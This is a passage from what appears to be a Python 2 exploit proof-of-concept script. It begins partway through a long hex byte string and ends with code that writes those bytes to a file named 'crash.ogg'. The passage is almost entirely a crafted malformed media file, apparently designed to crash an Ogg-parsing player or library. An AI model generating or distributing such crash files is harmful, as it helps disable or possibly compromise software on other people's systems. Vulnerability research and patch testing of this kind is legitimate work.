23\x3D\xA6\xF8\xFB\xC9\xDB\xA4\xAF\x2C\x49\xE1\x3B\xA1\x10\x80\x02\x5E\x8B\x25\x69\x8D\xE0\xBF\x21\x21\x0C\x24\x0A\xDE\x5E\xA1\xCC\xC1\xFE\xE7\x80\x49\x39\x09\xFE\x22\x20\x2F\x97\xB5\xE3\xD8\xE7\xA8\x39\x2A\x28\x69\x3A\x74\x00\x00\x00\x00\x00\x64\x56\x6A\x55\xD5\x11\xB7\xB2\xBE\x75\x36\x26\xD6\x46\x9B\x7D\xD9\xFC\x6F\x5E\xD4\x7E\xD2\xC6\x4B\x72\x7A\xB0\xCE\x87\x3F\xBA\xF2\x81\xBF\xAC\x94\x9C\xD2\xFF\x90\xDE\x2F\x83\xFE\x3F\x3F\xCA\xCE\x07\x37\x29\x0B\x43\x5B\x25\xA6\xC3\x3D\xC7\xDE\x99\x4C\xEB\x69\xDB\x35\xE1\x9A\x5C\xEF\xF9\x8D\x9E\x6A\x22\x51\x4D\x77\xB4\x8A\xDC\x61\x21\x24\xDD\x55\x1E\xA2\x7D\x0C\x3F\xB1\xAF\x23\x96\x12\x49\x65\x27\xF5\x3C\x53\xF7\xCB\x6C\x71\xA2\xE2\x51\xFF\xE2\x55\x8D\xD1\xC3\x77\x1E\x35\xF7\x4B\x9B\xFF\x96\x30\x97\x77\x3E\xF7\xF8\xCC\x57\x34\xF3\xEE\x0C\xF3\x5E\x61\xED\xC3\xD3\x96\xE3\xD3\xAA\x98\x92\x72\xFE\x4F\x79\xE4\xCB\x21\x73\x6C\xCE\x50\xEF\x2F\xF2\x1C\x35\xFB\x55\x65\x1E\xBF\xB9\x84\x77\xE2\x24\x45\x29\xF4\x47\xC0\x5D\x49\xEF\x35\xAB\x87\x7E\xAE\x5F\xA6\x9F\x62\x3A\x1B\x38\x9D\x99\xCC\x0A\xD9\xDA\xF8\xFD\xAD\xC3\x9E\x4F\x5D\xA0\x93\x64\xEA\x9C\xCC\x97\xEA\x6E\xA6\x70\x0B\x8A\xFC\xEF\xFD\xCA\x58\x38\x40\x96\xBE\x5A\x8C\x26\x7E\xE9\xE1\x70\xA9\xEC\xCF\xE8\xD4\xBE\xAB\x48\xA6\xB0\xBE\x66\xF8\x4B\x7B\x79\x77\x2F\x5F\xA6\x98\x37\xE5\xF0\x0F\xBA\x2D\xAA\x02\x00\x3E\x7A\xB5\x14\x17\x21\xFE\x3B\x23\x12\xA6\xB2\x64\xDD\xD2\xAB\x05\x7C\xF0\xFF\x2C\x20\x21\xFF\xF2\xD3\xE8\xBD\x66\x62\x42\xDF\x32\x97\xA7\xF9\x71\xA7\x80\x91\xE9\x92\xD1\xC0\x19\x78\xCD\xE3\x02\x5E\xF7\x0B\x20\x40\xDB\xB6\x80\xA7\x1E\xFB\xF9\x04\x00\x00\x00\x00\x00\xF0\x49\xF3\x2A\xF5\xC9\xD8\xFB\x8B\xDD\xD1\xB8\xD9\x69\xD3\xD5\x7E\xAC\xE1\x25\x5E\xA9\xDF\xC8\x09\xF7\xFE\x31\x37\x45\x26\x34\xA7\x3D\xAF\x23\x7C\x13\x29\xBE\xAF\xA7\x08\xB9\x0D\xB8\x21\x94\x74\x97\x50\x47\xDB\x57\xA5\xAE\xA7\xD0\x11\x72\x3B\x4F\x2F\x1D\xF7\x2F\x97\xA5\x0B\x21\x77\x81\xBC\xB7\x57\xD3\xFD\x46\x43\xAF\x15\xD4\x94\x46\x1D\xF7\x99\x65\x66\xC6\xCD\xD3\xD7\x8F\x70\xD8\x59\xCF\x9C\xFC\xAF\x3E\x8F\x7A\x9C\x6C\xD5\x84\x5D\x92\xFC\x22\x7E\x32\xE7\x9A\xFB\x5D\xBE\xC6\x48\xED\x3F\x0D\x1A\x66\xAA\x4A\xCA\xFC\xE7\xA5\xCE\x17\x41\xC4\x59\xD5\xD4\x1D\xD9\x66\x7C\x76\xD5\x21\x89\x64\xEB\xC2\xDB\x0F\x88\xAE\xB9\xCE\x37\x1F\x96\xE6\x19\xD7\x32\xCF\xDE\x4F\xF7\xC9\x3D\x97\xBA\x3C\x5E\x3A\x59\x34\x6E\x56\x57\x0F\x53\x74\xA2\x9B\x19\x5A\x5E\xF8\x06\x8F\xEE\x08\x27\x96\xE8\x6B\x5A\xD5\x3D\x41\x05\x9D\x08\x01\x9A\xEA\xA9\xAB\xEA\xF8\x8A\x7B\x38\xD8\x5D\xA8\xC7\x75\x9B\x49\x0F\x54\xC4\xAE\xDF\x3E\xF2\x79\xA3\xD9\xD8\x93\xED\x52\x81\x9B\x32\x99\x3E\x8A\xEF\x7E\x24\xF4\x64\x83\x11\x00\x0A\x6A\xA2\xA2\xCF\xA8\x28\xAA\x00\xAA\xC8\xA3\x82\x88\x29\xAA\x8A\x20\x28\x22\x3F\x2F\x72\x20\x49\x92\x2C\xAC\xBF\x58\x7F\xD7\xAD\xE1\xB7\x15\x48\xC2\x00\x5E\x8B\x85\xC0\x05\xFE\x1B\x26\x6C\x24\xC1\xEF\x6E\x01\x4E\x19\xE6\xBF\x82\x92\x06\x92\xE0\xD7\x59\x92\xB8\x10\xB0\xCF\x63\xCC\xA5\xAA\x2A\x1C\x0E\x1F\x00\x00\x00\x00\x00\xEC\xCF\xEA\xA3\x9D\x1E\x85\xC4\xA8\xD9\x4E\xB9\x55\x99\x58\xA9\xBE\xAB\x76\x98\x79\xF5\xA6\x1A\x32\x19\x57\xD9\xD6\x57\xCB\xED\x53\x2E\x3E\x4D\xF7\x0A\x73\xAE\x91\xD7\x37\x1B\x28\xE9\xC4\xA7\x56\xFB\x31\x89\x2C\xBA\xBE\xF3\x5B\xCE\x96\x58\xB8\x2E\x2D\x5D\xE4\xDD\xB0\x38\xDE\x7C\x03\xF0\x5A\x8F\xEA\xF3\xD3\xE9\x2C\x5C\x0E\x78\x9C\xED\xBC\x7F\xE2\x9B\x58\x45\xEA\x3C\xA7\xEA\xE1\xF2\x4D\x1F\xE8\xC7\x92\x5B\xDB\xE1\xE3\xA9\xF3\xD6\x90\x4C\x7C\x73\x90\x9F\xEE\x54\x70\xDB\xBB\x4C\x2E\xCC\xF3\xAF\x75\xAF\xEA\xB6\xC9\xCC\xAA\xAC\x5A\x1E\xFF\x9F\x9D\xA9\x38\x24\xDE\x56\x9D\x49\xD7\x9D\xA2\x1A\xD5\x30\xBE\xFF\x12\x3F\x58\xBE\xEF\x9F\xAB\x59\x94\x11\x10\x4C\xAD\xB1\xF3\x5A\x88\x4B\xC4\xED\x06\x6A\x1C\xE7\x12\x06\xB5\xC2\x34\x2C\x5E\xCF\x4C\xE5\x66\x3E\x64\x26\xE5\x94\x28\x6C\xA7\x66\x9D\x9A\x31\x8C\x60\xCF\x79\x89\xFB\x8B\x6C\xA8\x6E\x31\x2D\x2F\x94\xA7\x33\x27\x9B\x21\x6D\xAE\x33\xF9\xEC\xEB\xD8\x08\x21\x21\x7C\x96\xDA\xC5\xB7\x9D\x8A\x51\x6F\xCC\xD5\x7E\x53\xB9\xEA\xD9\x77\x7C\x7B\xCF\x13\xD1\xB7\xC8\x77\x8F\x14\x43\x45\x9F\x85\x7B\xAA\xA8\x21\xFA\xA4\xCF\xE6\x0D\xF3\xB2\xE8\x4D\x13\x41\x00\xFE\xCB\x95\xC2\x45\xCD\xBF\x06\xB1\xFD\x32\x24\x8A\x1C\xCC\x65\x3A\x05\xF9\x9F\x01\x1C\x24\x8A\xAD\xF5\xBE\x6F\xC2\xB1\xCF\xAD\xF6\x59\xAD\xB2\xD1\xC9\x00\x00\x00\x00\x00\x69\x25\x8D\x17\x57\x5F\x87\xAF\x65\x6B\x46\x39\xE4\xDC\xAF\x72\xA7\x6B\x27\x21\x75\xD3\xF2\x96\x07\x13\xBD\xBB\x1D\xCE\xE7\xA1\xF1\x8A\x1F\xD9\x8E\x3D\xAF\x18\x8F\xA7\xC5\xE9\xCD\x39\x71\xBA\x96\x35\x07\x3B\x3D\x6F\xB9\xBB\x5E\x2C\x4E\x13\x71\xEE\x9D\x77\x93\xFE\xD7\x7B\x73\x42\xF4\xAF\x1A\x7E\x30\x13\x27\xF3\xFF\x88\x4B\xEA\xF1\x96\xF0\x39\x59\x05\xB7\xB6\xC9\x7D\xFE\xF1\x9C\x33\x6A\x82\xE6\xE4\x27\x34\x59\x49\x81\x2C\x98\xFD\x12\xA1\xDD\xD5\x79\xCC\x2E\x6B\x2A\x2B\x76\x1C\x23\x85\x50\x2F\xD9\xF4\xDD\xA7\x5F\xAD\x8D\x3A\xA2\xF8\xDA\x23\x58\x6B\x2E\x7C\xB8\xCA\xFB\xA5\x4D\xBA\x86\x6B\x77\x7D\xEC\xAF\x4F\xB3\x87\x83\x73\x38\xBD\x94\xAF\xD5\xB9\xF9\xB6\x71\xDD\x1B\x28\x60\xDC\x67\x47\xCC\xED\xC1\x24\x64\xAF\xD1\xCE\xC3\x94\x00\x6A\x1E\x3A\xA7\xA8\xD6\x7C\xCD\xE6\x70\x32\x67\x09\xFE\xFD\x52\xE7\x4E\xB5\xC8\xE2\x64\x51\x71\x4F\x56\xE2\x5D\xF3\xE2\x56\x77\xDB\x68\xB4\x0C\x32\x17\x91\x16\xB3\x75\x5F\xF4\xDE\x00\x1A\x2F\x77\xA6\xD3\x9F\x9F\x52\xEC\x25\xA3\xD3\x23\xE3\x0B\xD6\x8D\x64\xC2\x50\xA1\x43\x85\xA1\xDE\x84\x1C\x18\xD9\x16\x38\x00\x36\x9A\x0D\x40\x0E\xE6\x3F\x03\x92\x1B\xC9\xFA\x3A\xB5\x45\x44\x0D\xE6\x3F\x07\xC2\x44\xAA\xFD\x67\x1D\x79\xD1\xFA\x63\x4D\x62\x76\xF3\xF2\xD1\x38\x1C\x67\x77\x5B\x37\x4F\x9E\x71\x61\xCC\xC7\xCE\x8C\x58\xCE\xE7\x43\xC2\xDE\xB6\x59\xA3\xE5\xCA\x34\x3D\x17\x00\x00\x00\x00\x00\xA6\x0D\x6E\x36\xFA\xCF\xAC\x72\x63\x0F\xBA\xDB\xCE\x33\xB5\x5A\xCE\x3F\x99\x57\x7B\xA8\xBB\x38\x5F\x3A\xBC\x69\x9A\x93\x63\xEB\x6F\x59\x7C\x57\xBE\xF6\xAE\x97\xF6\xD7\xBF\x27\x1D\x79\x3C\x8C\xD2\x67\xD6\xF3\x35\xB8\xE0\xFE\xF1\x7A\xF1\xF5\xEA\x73\xEE\xF5\xFB\xD1\xEE\x5C\xE2\x93\xC7\x5D\x45\x9D\x5D\xD7\x8A\xB2\x81\xDD\x9B\x86\xDA\x4B\xD5\xD6\x00\xB5\x09\x8F\x2B\x4E\x7B\x20\x4B\x78\xAD\x35\xB9\xD5\xD3\xD5\xE7\x4B\x9B\x9E\xF3\x25\xAE\x47\xEA\xA8\xE0\xB1\xDF\x8F\x1A\x6D\x92\x8F\xB0\x3E\xFF\xC1\x8C\xE3\x6F\xA2\x08\x0A\x1F\xFC\x55\x1E\x0D\x5F\xD9\xAA\x8B\xCA\xCA\xCA\x4E\x9A\x66\xF3\x4B\x24\xE7\x26\x14\x63\x0D\x87\x81\xE7\x57\x7D\x55\xCF\x9D\x99\xD5\xF1\x35\x69\x2A\xEB\xF5\x7D\x4E\x36\x5D\x59\x2A\x86\x1A\xB6\x6A\x5D\x5B\xF0\x9A\x6C\x5B\xE7\xA3\xAA\xBD\x1C\x9F\x54\x0D\x1B\x20\xAD\x86\xDD\xEB\x7D\x9E\x2C\x24\xAA\x18\xB5\xC0\xE4\x93\xB9\xC9\x65\x22\x90\x29\x73\x4B\x8D\xBE\x2D\xA6\x23\x8B\x9D\xF0\xA6\xA4\xA6\x7D\x57\xA7\x7D\xBC\x5B\x08\x0B\x02\x6C\x49\x36\x72\xE8\x40\x86\x77\xCB\x7F\x0D\xFF\x2E\xBF\xCB\xB6\x90\x02\x51\x53\x0F\x15\xE3\xC9\x50\x41\x15\xB4\x72\x4B\x36\xE2\xA1\x46\xC7\x46\xBD\xB5\xDA\x94\x33\xA8\xED\x60\xF8\x01\xCC\x24\x20\x00\xB8\xDB\x07\x98\xED\xEF\xDB\x22\x81\xC3\xFE\xF2\xFC\xBA\x14\xFB\x1D\xCF\x06\xD7\xE3\xB8\xFC\x3D\x6F\xD0\xDE\xD0\x61\xFE\x1C\xAF\xB9\x72\xE3\xED\xC2\xA2\xB8\xF6\x6E\x5E\x1A\xF8\xF0\xB5\x61\xFC\xD1\x06\xDC\x8A\x05\x35\xE6\xA5\x26\x07\xA9\xE2\x52\x8E\xFF\x84\xBA\x6E\xFE\x00\xDB\x2C\xC8\xEC\x89\x01\xC0\x83\x25\xC0\xF4\xA5\xD3\x70\xFC\xDF\x9C\xB9\xEB\x85\x25\xCA\x3D\xF1\xE1\x8A\x6E\xEB\xEB\x2F\xFC\x64\x53\xC6\x7A\x36\xE5\x9B\xE7\xBD\xE9\x9C\x67\xF2\xF2\xB8\x79\x79\x70\x72\xEF\x75\xAE\x07\x69\x89\x6E\x7F\xF9\x51\xE5\xA4\xDF\x02\x00\xAC\x5E\x23\xBF\x41\xCE\xDD\x99\xDA\x8D\x3C\x9D\x87\xFA\xD6\xB1\x7D\xD7\xA7\x75\xDB\xAC\xE5\x04\xE9\xB0\x1B\xC7\x0D\x3C\x55\x6D\x67\xDF\x9A\x9F\xEF\xBF\x74\x36\x77\x23\x1F\xEB\xB5\xF7\xEA\x9D\x6A\xAE\x9B\x6F\xD5\xDD\xB7\x65\xAF\xF7\x97\x16\x23\xDF\xD4\xC3\xA5\x73\xFB\x1F\x14\x79\xFC\xE2\x95\xBF\xB0\xD7\xA8\xC1\x92\x65\x3B\xDB\x3D\x1F\xF3\x45\x00\xC4\x76\x75\x39\xCC\xD4\xF4\x20\xD4\x3B\xE0\x23\xA6\xD4\x24\xFC\x03\xAC\xFB\x82\x8A\xE7\xDB\x93\x00\xFD\x1A\xC0\xB0\xDE\x9B\x2F\x5C\x47\x3F\x3D\x8F\xF1\xFF\x86\x5D\x6E\xBE\x7E\x8D\x17\x5F\x99\xD7\xF2\x3A\x18\xAC\x63\xD2\xFD\x1D\x1C\x3B\x4B\xA9\xFE\xA2\x6A\x4F\x1E\xFF\x8C\xEE\xD6\x48\xAA\xA2\x47\xE7\xDF\xBC\x2C\xB8\xF5\xA4\x03\x9A\x9A\x0D\xE1\x1C\xF4\x3F\x07\xC5\x44\x12\x5E\x68\xB6\x00\x52\xE0\xBF\x01\x23\x4C\x24\x91\xFB\x03\x00\xE4\x6B\xF1\xE1\xEC\xD1\xD9\xEC\x26\xA2\xDF\x04\xE7\xC9\x49\x9E\x74\xCA\x03\xCC\xFD\x38\xF6\xAA\xA0\xA5\x1B\x9E\x8C\x31\x55\x19\x00\x00\xC6\x44\x12\x21\x22\x76\x1B\xDC\x9E\xBF\xD3\x47\x0D\x39\xE5\xE5\xEB\xB3\xB8\xF4\xF5\x4B\xBF\xD2\x99\xEE\xD3\x71\x8F\xA6\xE1\xB8\x3D\x1B\x0D\x4A\x69\x8A\x97\xB6\xEB\x82\xB1\x62\x17\x35\xBD\x99\x1B\xA0\x59\xD8\xB4\x96\x30\x5A\x83\xB3\x67\x88\xCE\xB5\xD3\xB9\x57\x35\x86\x46\x13\x9D\xED\xE8\x59\xBA\xEB\xBE\x5A\x5A\x74\xD2\xBF\x2F\x2B\x66\x2B\xCF\xF1\x7D\x41\x7C\xCE\x9B\xC6\x2F\xD5\x59\xB3\x85\x7A\x34\xA3\xFD\x9E\xD8\x1E\xE9\xB5\x8E\xC6\x76\x40\x3B\x1D\xAE\xC7\xE5\x25\xDF\x7E\xF6\x62\x5B\xE0\xA0\xA6\xBB\x67\x49\xA2\x7D\xA3\x8B\x0D\x30\xFF\xFB\xFE\x9B\x83\xEA\x99\x02\x4D\xD4\x26\x92\xBA\x78\xC9\x17\xAD\x79\xBF\x58\x50\xCE\x1C\x9B\x2E\xCF\x6B\x91\xA8\x17\xD7\xAB\x9A\xDE\xCC\x28\x93\x33\xEF\x8D\xA9\xBB\xDE\x4A\xBC\x75\x4A\xDE\x52\xE7\x49\x3F\x62\x26\xF8\xCC\x46\xB5\x49\xA0\xE1\xD7\x79\x89\x28\xFA\x12\x9B\xCE\x8D\x48\x98\x35\xBB\xF3\xFE\xEA\x9E\x36\x3D\x9B\xD9\xC9\x34\xD6\xDD\x0D\xB0\xBB\xA6\x99\x5C\x69\xD8\x7D\xC9\xDF\x19\x47\x20\x23\x61\xD9\x46\x16\xE8\x46\xC6\xD8\xC2\x13\x73\x8D\x6F\xF8\xFE\x76\x5A\xF8\xF9\x77\x77\xAD\x8B\x37\x73\x32\x95\xD5\x11\x38\x70\x7F\x60\xD9\x60\x1C\x5A\xC2\x0A\xE4\x3F\xC2\x96\x1D\xD0\x00\x0E\x98\x15\xC0\xF0\x1E\xC7\x82\xDE\x07\xD3\x85\x7C\x48\x2F\xF0\xC4\x31\xAD\xC4\xD1\x36\x40\x21\x08\x7E\xDB\x45\x20\x07\xF9\xAF\x81\xF2\x22\x59\x5B\xEF\x96\xC5\x18\xEC\xBF\x06\xC2\x46\x12\xFC\xBD\xFE\xB4\x57\x62\x2F\x7C\x03\x67\x94\xB0\xCF\x39\x6B\x6B\xA3\x32\x2D\x75\x61\x00\x00\x00\x00\x80\xC9\xFB\xD3\x63\x26\xEA\xE7\xC7\xB7\x5F\x5F\xA7\x06\x1B\x93\x7B\x0D\x87\xB3\x8D\xC9\x91\xB3\xDD\x5B\x75\x1D\xB7\x9B\x7E\x65\xA2\xDA\x3B\x48\x5A\x5E\x27\x9A\xB5\x95\x37\xBB\xAB\xF2\x97\xC7\x07\x85\x26\xE7\x68\xD5\x74\xCE\xC9\xB6\x4B\xE5\xF1\xBA\x0F\x44\x48\xB8\x27\xD4\xDD\xA9\x3C\xB2\xEE\x55\x4F\xDA\x6C\xFC\xCA\xDE\xCF\xB0\x32\x9F\x28\xD8\xE1\x97\xBF\xB4\x2B\xCF\x53\x35\xE7\x92\x1C\xBB\x39\xFA\xE5\xE5\xF8\x99\x07\xDC\x1B\x77\xBA\xA9\x0E\x89\xCE\xC2\xD9\xF7\x6F\xE7\xC1\x43\x47\x56\x9E\x99\x9D\x86\x86\x9F\x7A\xB4\x6F\xB9\x6F\x49\x40\x29\x87\xAB\xAF\x6E\x5A\xF5\x44\x53\x71\xF5\xF4\x94\xEF\xE6\xF9\x0F\x31\xE7\x7D\xE3\x55\xAA\xF1\xD8\x84\x76\x35\x67\x32\x6E\x4F\x96\x93\xA5\xCE\x8C\x47\x91\x14\x9F\x35\x7D\x0C\xEF\xC7\xD6\x90\xEC\x7A\xBD\x7B\x8C\x72\x98\xEE\xBB\x78\x3D\x4E\xD7\xCC\x54\xDD\xC5\x5E\x46\x9E\x8A\xFA\x2D\xB9\xE8\xE9\x5D\x95\xBD\x4D\xA8\x9D\x73\x66\x21\x2B\xD7\x76\xC2\x74\xB5\xF7\xDC\xBD\x9F\x29\x8E\x71\x63\xFF\x5B\x12\x9B\x76\x3D\x61\xF8\xB6\xBC\x35\x71\x34\x33\xBF\xFF\x35\x7F\xFE\x2C\x05\xB6\x04\x18\x02\xFF\x0B\xDF\xC2\xE0\x47\x96\x83\x50\x8A\x58\xC2\xD0\x37\xD3\x10\xC3\x14\x51\x15\x45\x01\x1E\x7C\xA5\xAE\x06\xF3\x9F\x05\xC2\x40\xAA\xFD\x6F\x56\x9A\x18\x93\xFD\xE7\x4C\x62\xD8\x48\xD6\xB7\xDA\xF4\x2C\xAC\x63\x8F\x4E\x37\x38\x3B\x55\x30\xDA\x9C\x35\x5A\x6E\x15\x23\xC7\xCE\x00\x00\x00\x00\x00\xE9\x98\x31\x45\xEF\x87\xEF\x67\xE5\xD9\x7A\x7B\xE5\x60\xBD\xB2\x79\x98\xCC\xE2\xEC\xEA\x6B\x97\xD9\xC5\xEA\x14\x2B\x4D\x87\x31\x7E\x30\x7B\xBC\xC7\xC5\xC2\x7E\x5A\x31\x7F\xFD\xB7\xE9\xD1\xA7\x2F\x35\x3C\x2E\xE8\x28\xA3\xAF\x33\x1F\x31\xDE\x38\x13\x3B\x7F\x82\xBE\x23\x9D\x3C\xBF\x08\x3A\xBF\x1E\x26\xA9\xDD\x7B\xD4\x0D\x3F\x1C\x3A\xEB\x86\xCA\xF2\x4D\x48\x71\xE7\xD2\xFE\x1F\x7B\xAC\x25\x55\x22\x97\xC6\xBF\xFB\xA1\x2B\x67\xE3\xEF\xCC\xAC\x2F\xBB\x2A\x35\xEA\xC2\xF8\xE5\xE9\xDE\x69\x7E\x9D\x70\xA2\xA2\x71\x57\xC2\x6C\xC2\xDF\xE2\xEB\x39\xC9\x87\xEC\xD2\x5E\x45\x1D\x53\x5F\xEE\xBF\x3C\x66\x1B\x83\xB5\x5D\x43\x41\xA9\xD9\xFB\x22\x7F\xBD\x70\x73\x25\xF4\xFA\xFE\xCA\xE8\x88\xED\x73\x2E\xB9\x9C\x64\xA7\xB3\x61\x89\x7B\xDF\x11\x44\x52\xDF\x7A\xDC\x92\xEC\x7C\xA2\x2B\x8F\x92\x5C\x9B\xCE\x21\x1F\xC8\xCC\x15\xEF\x53\xB0\x5B\xE5\x51\x5F\x18\x72\x0F\x89\x7F\x69\x59\x10\x58\x36\xF8\x58\x15\x11\x6D\x96\x8E\xDB\xEF\xCD\x38\xC6\xA7\xEF\xE7\xFE\x68\x61\x61\x26\x5E\x15\x11\x95\xC7\xA6\x29\x02\xA6\x8A\x20\x2A\xC6\x91\x88\xBE\x6D\x99\x68\xF8\x2F\xB0\x1C\x38\xB0\x6C\x09\x05\x00\xBE\xAB\x85\x2E\x47\xC8\xFF\x0C\x22\xED\x55\x91\x28\xF2\xAD\x16\x53\x17\xF8\xCF\x19\x30\x90\x78\xAB\x93\x33\x37\xFD\xFB\xB9\xDF\x25\x5C\x5A\x01\xDB\x9C\xFB\x29\xA0\xDC\x67\xAB\x24\x13\xD2\x77\x06\x00\x00\x00\x00\xD8\xC9\x3C\x93\x47\x63\xF7\x34\xFE\xCF\xCC\x36\xDE\xF0\x6B\xEF\xE1\x64\xC2\x28\x91\xE3\xC1\x69\x0E\xC5\x2B\x2D\x39\xB7\xAD\xEB\x6E\xB6\x66\x64\xD7\x2F\x96\xA7\xCB\x3A\xFD\xB5\xF3\xFD\xD5\x43\xF5\xB0\x8D\xBD\xA9\xFE\x31\xA3\xFB\xAF\x0E\xB4\x8A\x60\xC6\x5C\x1A\x5D\xC7\xC1\xDC\x72\x65\x22\x0B\x7C\xC4\xDE\x77\x96\x9F\xAD\xC9\xD3\x33\xDB\xF9\x1F\x3D\x8F\x9C\x49\xA7\xE7\xF5\xBB\x15\xCF\xBB\x93\xF3\x2C\x6D\xF3\x6F\x8C\x35\x97\xFC\x85\xFB\xCE\x1C\xAE\xE1\x92\xD4\xE3\xF1\x3B\x6C\xAC\xD9\xB3\xC2\xDD\xDD\x25\x4E\x37\x8B\xC4\x38\x86\xFB\xBE\xEF\x6B\xEB\x83\x59\xEF\xF9\x15\xE8\x61\xAA\x9A\x66\xB7\x5E\xB6\x2A\xC9\x5E\xFC\x29\x31\x4D\x49\x6F\x9F\x48\xA8\x74\x1D\xE5\xE4\xEB\x3F\x97\x23\xB8\x17\x6C\x7E\xCA\x3F\x5C\xAA\xA4\xA7\x3C\x96\xBD\xF8\xFE\x74\x7F\xF0\xB7\xA9\x3D\x6D\x4D\xEF\x7D\xFF\x5C\x75\x8C\x2E\x7B\x36\x61\xB5\x30\x50\x11\xF0\xCB\x14\x64\x2D\x59\x3D\x9C\xA1\x7E\xEE\x1E\xCF\x90\x39\x4F\x6B\xD3\x1A\x26\x2B\xAC\xF6\x16\x2A\x26\x7A\xF3\xB6\xF5\xCD\x4B\xB0\x6F\x4E\x4B\x56\xEC\x3F\x72\x88\x25\x00\x59\x92\xC1\x96\xF4\x81\xE5\x2D\xD3\xDB\x67\x4B\x72\x53\x55\xCC\xDF\x31\xC4\xB0\xD7\x7B\x72\x33\xD4\x5F\xE4\xF0\xAF\xCF\x0E\x6D\x49\x78\x00\xBE\xAB\x85\x22\x46\xFD\xBF\x41\xC6\x56\x99\x53\xED\x67\xB5\x24\x4C\x71\xFD\x6F\x00\x03\xA9\xFE\x97\xC1\xB0\x76\x02\xA3\x8E\xD4\x29\xA0\xDA\x53\xAD\x72\x34\x7C\x30\x00\x8C\x30\x00\x00\x20\x72\x31\x5C\xFB\x63\x1B\xE5\xA9\x53\xFB\x75\x73\x54\x97\xDD\x6D\xB7\x36\x39\x36\xF5\x0B\xF1\xAE\x04\x0A\xDE\xF4\x91\x78\xC9\x51\xAF\xF1\x13\x6B\xF2\x95\x0F\xDB\x7B\x9F\x8C\xFD\xDF\x79\xF9\xE7\x0F\x07\xD9\x94\xCD\xEB\x94\xBA\xFD\xC7\xE4\xBA\xF6\xE7\xC1\x3C\x72\xAF\x8F\x8B\x33\x1E\x74\x72\x8B\x6C\xC5\x0F\x5D\xED\x93\x12\x1A\xFE\x77\xFF\xFB\xEA\xE4\xFD\x6D\x57\x33\xA6\x39\xD4\xA7\xC1\x65\x65\x73\xE5\x7F\x89\xCD\x66\x53\x03\xFB\x67\x15\x73\x95\x48\xF7\xA6\xE7\x79\x3A\xDD\x1C\x2D\xC7\xCF\x3C\xCE\xF1\xCC\xCC\xA9\xC7\xB9\x23\x1D\x39\x7C\x43\x64\xA9\x9B\x60\xA1\x7D\xF5\x4B\xC6\xDB\x05\x8C\xFC\xA5\xAC\x7B\x3C\x7D\xBE\xBE\xC9\x5B\x91\x71\xB3\x24\xBB\x8D\xEF\x3C\xEA\xDD\x47\x9E\xC8\xC9\x30\xF0\x9B\xA3\xBD\x16\x91\x48\xA2\x42\x4C\x6F\x42\xF5\x99\xCA\xA2\x12\xBA\xEE\xAE\x7D\x5E\x53\x9F\xF5\x01\x93\xC3\xE0\xEB\xA0\x15\x98\x33\x6A\xDD\x4F\x67\x67\x53\x00\x01\x00\x55\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x04\x00\x00\x00\x16\x3D\x35\xFD\x28\x46\xFF\x4C\xFF\x52\xFF\x4E\xFF\x6A\xFF\x53\x46\x51\x54\x53\x56\x52\x51\x58\x51\x52\x48\x44\x56\x54\x56\x56\x53\x58\x53\x51\x51\x56\x52\x57\x57\x55\x52\x57\x54\x3B\x0B\x66\x98\xFB\xBD\xAF\x64\x85\xD6\x55\x54\xFE\x7B\x37\xE0\x9C\x80\xCF\x62\x57\xBC\x6B\x61\xB2\xCC\xFF\xCA\xD2\x2F\x63\xD7\x28\x5C\x9E\xC7\x77\xA1\xDA\xBC\x9F\xFD\x42\x13\x9B\xA7\xA1\xA6\xAA\xA2\xE6\x49\xC5\x14\x11\x51\xC1\x90\xEF\x31\xB8\xFB\x58\x50\x70\x00\x10\x48\x00\x02\x3E\xCC\x65\xB1\x06\xFD\xCF\x81\x74\x33\x24\x0D")
filename = "crash.ogg"
file = open(filename , "w")
file.write(crash)
print "\n Files Created!\n"
file.close()